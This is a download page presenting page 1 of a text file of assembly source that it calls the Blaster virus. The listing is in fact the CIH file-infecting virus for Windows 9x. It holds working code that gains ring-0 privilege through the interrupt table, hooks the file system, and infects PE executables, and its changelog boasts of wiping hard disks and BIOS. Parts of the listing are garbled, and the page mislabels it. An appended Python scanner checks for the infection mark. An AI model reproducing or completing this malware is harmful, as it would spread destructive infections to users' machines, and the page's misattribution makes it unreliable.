
cihxxxxx.txt

This is the source code of the Blaster virus with a detailed explanation; it can be used to understand the basic principles of the virus.
TXT
Page 1 / 2
; **************************************************************************** 
; * The Virus Program Information * 
; **************************************************************************** 
; * * 
; * Designer : CIH Original Place : TTIT of Taiwan * 
; * Create Date : 04/26/1998 Now Version : 1.2 * 
; * Modification Time : 05/21/1998 * 
; * * 
; *==========================================================================* 
; * Modification History * 
; *==========================================================================* 
; * v1.0 1. Create the Virus Program. * 
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * 
; * 04/26/1998 3. Virus Code doesn't Reload into System. * 
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * 
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * 
; * 6. When the System Opens an Existing PE File, the File will be * 
; * Infected, and the File isn't Reinfected. * 
; * 7. It is also Infected, even if the File is Read-Only. * 
; * 8. When the File is Infected, the Modification Date and Time * 
; * of the File are also not Changed. * 
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * 
; * Previous FileSystemApiHook, it will Call the Function * 
; * that the IFS Manager Would Normally Call to Implement * 
; * this Particular I/O Request. * 
; * 10. The Virus Size is only 656 Bytes. * 
; *==========================================================================* 
; * v1.1 1. Especially, the Infected File will not Increase * 
; * its Size... ^__^ * 
; * 05/15/1998 2. Hook and Modify Structured Exception Handling. * 
; * When Exception Error Occurs, Our OS System should be in * 
; * Windows NT. So My Cute Virus will not Continue to Run, * 
; * it will Jump to Original Application to Run. * 
; * 3. Use Better Algorithm, Reduce Virus Code Size. * 
; * 4. The Virus "Basic" Size is only 796 Bytes. * 
; *==========================================================================* 
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * 
; * 2. Modify the Bug of v1.1 * 
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * 
; **************************************************************************** 

.586P 

; **************************************************************************** 
; * Original PE Executable File(Don't Modify this Section) * 
; **************************************************************************** 

OriginalAppEXE SEGMENT 

FileHeader: 
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h 
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h 
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h 
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh 
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h 
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h 
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh 
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh 
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h 
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah 
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h 
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h 
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h 
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h 
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h 
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h 
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h 
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h 
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h 
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h 
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h 
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h 
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h 
; ********************************************************* 
HookExceptionNumber = 03h 

ENDIF 


FileNameBufferSize = 7fh 

; ********************************************************* 
; ********************************************************* 

VirusGame SEGMENT 

ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame 
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame 

; ********************************************************* 
; * Ring3 Virus Game Initial Program * 
; ********************************************************* 

MyVirusStart: 
push ebp 

; * IDT(Interrupt Descriptor Table) * 
; * to Get Ring0 Privilege... * 
; ************************************* 

push eax ; 
sidt [esp-02h] ; Get IDT Base Address 
pop ebx ; 

add ebx, HookExceptionNumber*08h+04h ; ZF = 0 

cli 

mov ebp, [ebx] ; Get Exception Base 
mov bp, [ebx-04h] ; Entry Point 

lea esi, MyExceptionHook-@1[ecx] 

push esi 

mov [ebx-04h], si ; 
shr esi, 16 ; Modify Exception 
mov [ebx+02h], si ; Entry Point Address 

pop esi 

; ************************************* 
; * Generate Exception to Get Ring0 * 
; ************************************* 

int HookExceptionNumber ; GenerateException 
ReturnAddressOfEndException = $ 

; ************************************* 
; * Merge All Virus Code Section * 
; ************************************* 

push esi 
mov esi, eax 

LoopOfMergeAllVirusCodeSection: 

mov ecx, [eax-04h] 

rep movsb 

sub eax, 08h 

mov esi, [eax] 

or esi, esi 
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 

jmp LoopOfMergeAllVirusCodeSection 

QuitLoopOfMergeAllVirusCodeSection: 

pop esi 

; ************************************* 
; * Generate Exception Again * 
; ************************************* 

int HookExceptionNumber ; Generate Exception Again 


; ************************************* 
; * Let's Restore * 
; * Structured Exception Handling * 
; ************************************* 

ReadyRestoreSE: 
sti 

xor ebx, ebx 

jmp RestoreSE 

; ************************************* 
; * When Exception Error Occurs, * 
; * Our OS System should be in NT. * 
; * So My Cute Virus will not * 
; * Continue to Run, it Jumps to * 
; * Original Application to Run. * 
; ************************************* 

StopToRunVirusCode: 
@1 = StopToRunVirusCode 

xor ebx, ebx 
mov eax, fs:[ebx] 
mov esp, [eax] 

RestoreSE: 
pop dword ptr fs:[ebx] 
pop eax 

; ************************************* 
; * Return Original App to Execute * 
; ************************************* 

pop ebp 

push 00401000h ; Push Original 
OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack 

ret ; Return to Original App Entry Point 

; ********************************************************* 
; * Ring0 Virus Game Initial Program * 
; ********************************************************* 

MyExceptionHook: 
@2 = MyExceptionHook 

jz InstallMyFileSystemApiHook 

; ************************************* 
; * Does My Virus Exist in System !? * 
; ************************************* 

mov ecx, dr0 
jecxz AllocateSystemMemoryPage 

add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException 

; ************************************* 
; * Return to Ring3 Initial Program * 
; ************************************* 

ExitRing0Init: 
mov [ebx-04h], bp ; 
shr ebp, 16 ; Restore Exception 
mov [ebx+02h], bp ; 

iretd 

; ************************************* 
; * Allocate SystemMemory Page to Use * 
; ************************************* 

AllocateSystemMemoryPage: 

mov dr0, ebx ; Set the Mark of My Virus Exist in System 

push 00000000fh ; 
push ecx ; 
push 0ffffffffh ; 
push ecx ; 
push ecx ; 
push ecx ; 
push 000000001h ; 
push 000000002h ; 
int 20h ; VMMCALL _PageAllocate 
_PageAllocate = $ ; 
dd 00010053h ; Use EAX, ECX, EDX, and flags 
add esp, 08h*04h 

xchg edi, eax ; EDI = SystemMemory Start Address 

lea eax, MyVirusStart-@2[esi] 

iretd ; Return to Ring3 Initial Program 

; ************************************* 
; * Install My File System Api Hook * 
; ************************************* 

InstallMyFileSystemApiHook: 

lea eax, FileSystemApiHook-@6[edi] 

push eax ; 
int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook 
IFSMgr_InstallFileSystemApiHook = $ ; 
dd 00400067h ; Use EAX, ECX, EDX, and flags 

mov dr0, eax ; Save OldFileSystemApiHook Address 

pop eax ; EAX = FileSystemApiHook Address 

; Save Old IFSMgr_InstallFileSystemApiHook Entry Point 
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] 
mov edx, [ecx] 
mov OldInstallFileSystemApiHook-@3[eax], edx 

; Modify IFSMgr_InstallFileSystemApiHook Entry Point 
lea eax, InstallFileSystemApiHook-@3[eax] 
mov [ecx], eax 

cli 

jmp ExitRing0Init 

; ********************************************************* 
; * Code Size of Merge Virus Code Section * 
; ********************************************************* 

CodeSizeOfMergeVirusCodeSection = offset $ 

; ********************************************************* 
; * IFSMgr_InstallFileSystemApiHook * 
; ********************************************************* 

InstallFileSystemApiHook: 
push ebx 

call @4 ; 
@4: ; 
pop ebx ; mov ebx, offset FileSystemApiHook 
add ebx, FileSystemApiHook-@4 ; 

push ebx 
int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook 
IFSMgr_RemoveFileSystemApiHook = $ 
dd 00400068h ; Use EAX, ECX, EDX, and flags 
pop eax 

; Call Original IFSMgr_InstallFileSystemApiHook 
; to Link Client FileSystemApiHook 
push dword ptr [esp+8] 
call OldInstallFileSystemApiHook-@3[ebx] 
pop ecx 

push eax 

; Call Original IFSMgr_InstallFileSystemApiHook 
; to Link My FileSystemApiHook 
push ebx 
call OldInstallFileSystemApiHook-@3[ebx] 
pop ecx 

mov dr0, eax ; Adjust OldFileSystemApiHook Address 

pop eax 

pop ebx 

ret 

; ********************************************************* 
; * Static Data * 
; ********************************************************* 

OldInstallFileSystemApiHook dd ? 

; ********************************************************* 
; * IFSMgr_FileSystemHook * 
; ********************************************************* 

; ************************************* 
; * IFSMgr_FileSystemHook Entry Point * 
; ************************************* 

FileSystemApiHook: 
@3 = FileSystemApiHook 

pushad 

call @5 ; 
je CallUniToBCSPath 

add al, 40h 
mov ah, ':' 

mov [esi], eax 

inc esi 
inc esi 

; ************************************* 
; * UniToBCSPath * 
; ************************************* 
; * This Service Converts * 
; * a Canonicalized Unicode Pathname * 
; * to a Normal Pathname in the * 
; * Specified BCS Character Set. * 
; ************************************* 

CallUniToBCSPath: 
push 00000000h 
push FileNameBufferSize 
mov ebx, [ebx+10h] 
mov eax, [ebx+0ch] 
add eax, 04h 
push eax 
push esi 
int 20h ; VXDCall UniToBCSPath 
UniToBCSPath = $ 
dd 00400041h 
add esp, 04h*04h 

; ************************************* 
; * Is FileName '.EXE' !? * 
; ************************************* 

; cmp [esi+eax-04h], '.EXE' 
cmp [esi+eax-04h], 'EXE.' 
pop esi 
jne DisableOnBusy 

IF DEBUG 

; ************************************* 
; * Only for Debug * 
; ************************************* 

; cmp [esi+eax-06h], 'FUCK' 
cmp [esi+eax-06h], 'KCUF' 
jne DisableOnBusy 

ENDIF 

; ************************************* 
; * Is Open Existing File !? * 
; ************************************* 

; if ( NotOpenExistingFile ) 
; goto DisableOnBusy 
cmp word ptr [ebx+18h], 01h 
jne DisableOnBusy 

; ************************************* 
; * Get Attributes of the File * 
; ************************************* 

mov ax, 4300h 
int 20h ; VXDCall IFSMgr_Ring0_FileIO 
IFSMgr_Ring0_FileIO = $ 
dd 00400032h 

jc DisableOnBusy 

push ecx 

; ************************************* 
; * Get IFSMgr_Ring0_FileIO Address * 
; ************************************* 

mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] 
mov edi, [edi] 

; ************************************* 
; * Is Read-Only File !? * 
; ************************************* 

test cl, 01h 
jz OpenFile 

; ************************************* 
; * Modify Read-Only File to Write * 
; ************************************* 

mov ax, 4301h 
xor ecx, ecx 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

; ************************************* 
; * Open File * 
; ************************************* 

OpenFile: 
xor eax, eax 
mov ah, 0d5h 
xor ecx, ecx 
xor edx, edx 
inc edx 
mov ebx, edx 
inc ebx 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

xchg ebx, eax ; mov ebx, FileHandle 

; ************************************* 
; * Need to Restore * 
; * Attributes of the File !? * 
; ************************************* 

pop ecx 

pushf 

test cl, 01h 
jz IsOpenFileOK 

; ************************************* 
; * Restore Attributes of the File * 
; ************************************* 

mov ax, 4301h 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

; ************************************* 
; * Is Open File OK !? * 
; ************************************* 

IsOpenFileOK: 
popf 

jc DisableOnBusy 

; ************************************* 
; * Open File Already Succeeded. ^__^ * 
; ************************************* 

push esi ; Push FileNameBuffer Address to Stack 

pushf ; Now CF = 0, Push Flag to Stack 

add esi, DataBuffer-@7 ; mov esi, offset DataBuffer 

; *************************** 
; * Get OffsetToNewHeader * 
; *************************** 

xor eax, eax 
mov ah, 0d6h 

; For Doing Minimal VirusCode's Length, 
; I Save EAX to EBP. 
mov ebp, eax 

xor ecx, ecx 
mov cl, 04h 
xor edx, edx 
mov dl, 3ch 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

mov edx, [esi] 

; *************************** 
; * Get 'PE\0' Signature * 
; * of ImageFileHeader, and * 
; * Infected Mark. * 
; *************************** 

dec edx 

mov eax, ebp 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

; *************************** 
; * Is PE !? * 
; *************************** 
; * Is the File * 
; * Already Infected !? * 
; *************************** 

; cmp [esi], '\0PE\0' 
cmp dword ptr [esi], 00455000h 
jne CloseFile 

; ************************************* 
; * The File is ^o^ * 
; * PE(Portable Executable) indeed. * 
; ************************************* 
; * The File is also not Infected. * 
; ************************************* 

; ************************************* 
; * Start to Infect the File * 
; ************************************* 
; * Registers Use Status Now : * 
; * * 
; * EAX = 04h * 
; * EBX = File Handle * 
; * ECX = 04h * 
; * EDX = 'PE\0\0' Signature of * 
; * ImageFileHeader Pointer's * 
; * Former Byte. * 
; * ESI = DataBuffer Address ==> @8 * 
; * EDI = IFSMgr_Ring0_FileIO Address * 
; * EBP = D600h ==> Read Data in File * 

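The "Get OffsetToNewHeader" and "Is PE / Already Infected" steps above reduce to one test: read the DWORD at offset 3Ch (e_lfanew), then read four bytes starting one byte before it and compare against 00455000h, so a zero byte directly in front of 'PE\0\0' is what the hook takes as "PE and not yet marked". The following Python scanner is an added defender-side example, not part of the listing, that applies the same filters (the .EXE name test and that DWORD compare) to a file image and reports how the hook would classify it; the sample images it builds are constructed, and the exact value the virus later writes as its mark is on the second page and is not assumed here.

```python
import struct

# The hook compares the DWORD read from (e_lfanew - 1) against 00455000h,
# i.e. the bytes 00 'P' 'E' 00: a PE signature preceded by a zero byte.
CLEAN_PE_WINDOW = 0x00455000


def inspect_pe(name: str, data: bytes) -> dict:
    """Mirror the hook's filters from the defender's side.

    Verdicts: 'not-exe' (name is not *.EXE, the hook ignores it),
    'not-pe' (no MZ/PE structure), 'marked' (PE, but the byte in front of
    'PE\\0\\0' is non-zero, which the hook treats as already infected),
    'clean-target' (zero byte in front of the signature).
    """
    result = {"name": name, "e_lfanew": None, "verdict": "not-pe"}
    # 'cmp [esi+eax-04h], "EXE."' tests the last four bytes of the BCS path;
    # upper-casing the name here is an assumption about that comparison.
    if not name.upper().endswith(".EXE"):
        result["verdict"] = "not-exe"
        return result
    if len(data) < 0x40 or data[:2] != b"MZ":
        return result
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]  # DWORD at 3Ch
    result["e_lfanew"] = e_lfanew
    if e_lfanew < 1 or e_lfanew + 4 > len(data):
        return result
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return result
    window = struct.unpack_from("<I", data, e_lfanew - 1)[0]  # dec edx; read 4
    result["verdict"] = "clean-target" if window == CLEAN_PE_WINDOW else "marked"
    return result


def build_sample(mark: int = 0) -> bytes:
    """Constructed minimal image: 64-byte DOS header with e_lfanew = 80h (as in
    the carrier stub above), 64 bytes of zeroed DOS stub, then the PE
    signature. `mark` lands at offset 7Fh, the byte in front of 'PE\\0\\0'."""
    dos = bytearray(b"MZ" + b"\0" * 62)
    struct.pack_into("<I", dos, 0x3C, 0x80)
    stub = bytearray(64)
    stub[-1] = mark & 0xFF
    return bytes(dos) + bytes(stub) + b"PE\0\0" + b"\0" * 20


if __name__ == "__main__":
    for fname, mark in (("GAME.EXE", 0), ("GAME.EXE", 0x5A), ("NOTES.TXT", 0)):
        print(inspect_pe(fname, build_sample(mark)))
```

Note that when e_lfanew is 40h the byte in front of the signature is the high byte of e_lfanew itself, so a real scan should also report e_lfanew rather than trust the mark byte alone.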